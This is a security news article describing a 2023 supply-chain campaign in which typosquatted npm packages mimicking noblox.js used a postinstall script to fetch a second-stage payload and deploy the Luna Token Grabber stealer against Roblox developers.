More than a dozen malicious packages have been discovered on the npm package repository since the start of August 2023 with capabilities to deploy an open-source information stealer called Luna Token Grabber on systems belonging to Roblox developers.
The ongoing campaign, first detected on August 1 by ReversingLabs, employs modules that masquerade as the legitimate package noblox.js, an API wrapper that’s used to create scripts that interact with the Roblox gaming platform.
The software supply chain security company described the activity as a “replay of an attack uncovered two years ago” in October 2021.
“The malicious packages […] reproduce code from the legitimate noblox.js package but add malicious, information-stealing functions,” software threat researcher Lucija Valentić said in a Tuesday analysis.
The packages were cumulatively downloaded 963 times before they were taken down. The names of the rogue packages are as follows –
- noblox.js-vps (versions 4.14.0 to 4.23.0)
- noblox.js-ssh (versions 4.2.3 to 4.2.5)
- noblox.js-secure (versions 4.1.0, 4.2.0 to 4.2.3)
While the broad contours of the latest attack wave remain similar to the previous one, it also exhibits some unique characteristics of its own, notably in the deployment of an executable that delivers Luna Grabber.
The development is one of the rare instances of a multi-stage infection sequence uncovered on npm, ReversingLabs said.
“With malicious campaigns that target the software supply chain, the difference between sophisticated and unsophisticated attacks often comes down to the level of effort the malicious actors make to disguise their attack and make their malicious packages look legitimate,” Valentić pointed out.
The modules, in particular, cleverly conceal their malicious functionality in a separate file named postinstall.js that’s invoked after installation.
That’s because the genuine noblox.js package also employs a file with the same name to display a thank you message to its users alongside links to its documentation and GitHub repository.
The bogus variants, on the other hand, utilize the JavaScript file to verify to see if the package is installed on a Windows machine, and if so, download and execute a second-stage payload hosted on Discord CDN, or alternatively, show an error message.
ReversingLabs said that the second-stage continued to evolve with each iteration, progressively adding more functionality and obfuscation mechanisms to thwart analysis. The primary responsibility of the script is to download Luna Token Grabber, a Python tool that can siphon credentials from web browsers as well as Discord tokens.
However, it appears that the threat actor behind the npm campaign appears to have opted only to harvest system information from victims using a configurable builder made available by the author(s) behind Luna Token Grabber.
This is not the first time Luna Token Grabber has been spotted in the wild. Earlier this June, Trellix disclosed details of a new Go-based information stealer called Skuld that overlaps with the malware strain.
“It highlights yet again the trend of malicious actors using typosquatting as a technique to fool developers into downloading malicious code under the guise of similarly named, legitimate packages,” Valentić said.